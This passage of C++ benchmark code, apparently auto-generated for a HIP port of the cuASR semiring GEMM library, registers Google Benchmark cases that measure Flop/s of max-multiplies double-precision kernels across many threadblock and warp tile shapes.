BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_8x32x8_8x32x1_2x4_4x8_1x1) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 4 x 4 // Threads / Warp: 4 x 8 // Warps / Block: 1 x 1 // Threadblock: 16 x 32 x 8 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 1) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_16x32x8_16x32x1_4x4_4x8_1x1(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<16, 32, 8>; using WarpShape = cutlass::gemm::GemmShape<16, 32, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); hipDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_16x32x8_16x32x1_4x4_4x8_1x1) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 4 x 8 // Threads / Warp: 4 x 8 // Warps / Block: 1 x 1 // Threadblock: 16 x 64 x 8 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 1) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_16x64x8_16x64x1_4x8_4x8_1x1(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<16, 64, 8>; using WarpShape = cutlass::gemm::GemmShape<16, 64, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); hipDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_16x64x8_16x64x1_4x8_4x8_1x1) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 8 x 4 // Threads / Warp: 4 x 8 // Warps / Block: 1 x 1 // Threadblock: 32 x 32 x 8 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 0) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_32x32x8_32x32x1_8x4_4x8_1x1(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<32, 32, 8>; using WarpShape = cutlass::gemm::GemmShape<32, 32, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); hipDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_32x32x8_32x32x1_8x4_4x8_1x1) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 2 x 2 // Threads / Warp: 4 x 8 // Warps / Block: 1 x 2 // Threadblock: 8 x 32 x 8 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 2) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_8x32x8_8x16x1_2x2_4x8_1x2(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<8, 32, 8>; using WarpShape = cutlass::gemm::GemmShape<8, 16, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); hipDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_8x32x8_8x16x1_2x2_4x8_1x2) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 2 x 4 // Threads / Warp: 4 x 8 // Warps / Block: 1 x 2 // Threadblock: 8 x 64 x 8 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 1) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_8x64x8_8x32x1_2x4_4x8_1x2(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<8, 64, 8>; using WarpShape = cutlass::gemm::GemmShape<8, 32, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); hipDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_8x64x8_8x32x1_2x4_4x8_1x2) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 4 x 2 // Threads / Warp: 4 x 8 // Warps / Block: 1 x 2 // Threadblock: 16 x 32 x 8 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 2) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_16x32x8_16x16x1_4x2_4x8_1x2(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<16, 32, 8>; using WarpShape = cutlass::gemm::GemmShape<16, 16, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); hipDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_16x32x8_16x16x1_4x2_4x8_1x2) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 4 x 4 // Threads / Warp: 4 x 8 // Warps / Block: 1 x 2 // Threadblock: 16 x 64 x 8 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 2) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_16x64x8_16x32x1_4x4_4x8_1x2(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<16, 64, 8>; using WarpShape = cutlass::gemm::GemmShape<16, 32, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); hipDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_16x64x8_16x32x1_4x4_4x8_1x2) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 4 x 8 // Threads / Warp: 4 x 8 // Warps / Block: 1 x 2 // Threadblock: 16 x 128 x 8 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 1) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_16x128x8_16x64x1_4x8_4x8_1x2(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<16, 128, 8>; using WarpShape = cutlass::gemm::GemmShape<16, 64, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); hipDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_16x128x8_16x64x1_4x8_4x8_1x2) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 4 x 4 // Threads / Warp: 8 x 4 // Warps / Block: 1 x 2 // Threadblock: 32 x 32 x 8 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 1) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_32x32x8_32x16x1_4x4_8x4_1x2(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<32, 32, 8>; using WarpShape = cutlass::gemm::GemmShape<32, 16, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); hipDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_32x32x8_32x16x1_4x4_8x4_1x2) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 8 x 4 // Threads / Warp: 4 x 8 // Warps / Block: 1 x 2 // Threadblock: 32 x 64 x 8 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 1) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_32x64x8_32x32x1_8x4_4x8_1x2(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<32, 64, 8>; using WarpShape = cutlass::gemm::GemmShape<32, 32, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); hipDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_32x64x8_32x32x1_8x4_4x8_1x2) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 4 x 4 // Threads / Warp: 4 x 8 // Warps / Block: 2 x 1 // Threadblock: 32 x 32 x 8 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 2) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_32x32x8_16x32x1_4x4_4x8_2x1(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<32, 32, 8>; using WarpShape = cutlass::gemm::GemmShape<16, 32, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); hipDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_32x32x8_16x32x1_4x4_4x8_2x1) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 8 x 4 // Threads / Warp: 4 x 8 // Warps / Block: 2 x 1 // Threadblock: 64 x 32 x 8 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 1) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_64x32x8_32x32x1_8x4_4x8_2x1(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<64, 32, 8>; using WarpShape = cutlass::gemm::GemmShape<32, 32, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); hipDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_64x32x8_32x32x1_8x4_4x8_2x1) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 2 x 2 // Threads / Warp: 4 x 8 // Warps / Block: 2 x 2 // Threadblock: 16 x 32 x 8 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 2) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_16x32x8_8x16x1_2x2_4x8_2x2(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<16, 32, 8>; using WarpShape = cutlass::gemm::GemmShape<8, 16, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); hipDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_16x32x8_8x16x1_2x2_4x8_2x2) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 2 x 4 // Threads / Warp: 4 x 8 // Warps / Block: 2 x 2 // Threadblock: 16 x 64 x 8 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 2) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_16x64x8_8x32x1_2x4_4x8_2x2(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<16, 64, 8>; using WarpShape = cutlass::gemm::GemmShape<8, 32, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); hipDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_16x64x8_8x32x1_2x4_4x8_2x2) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 4 x 2 // Threads / Warp: 4 x 8 // Warps / Block: 2 x 2 // Threadblock: 32 x 32 x 8 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 2) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_32x32x8_16x16x1_4x2_4x8_2x2(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<32, 32, 8>; using WarpShape = cutlass::gemm::GemmShape<16, 16, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); hipDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_32x32x8_16x16x1_4x2_4x8_2x2) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 4 x 4 // Threads / Warp: 4 x 8 // Warps / Block: 2 x 2 // Threadblock: 32 x 64 x 8 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 2) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_32x64x8_16x32x1_4x4_4x8_2x2(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<32, 64, 8>; using WarpShape = cutlass::gemm::GemmShape<16, 32, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); hipDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = 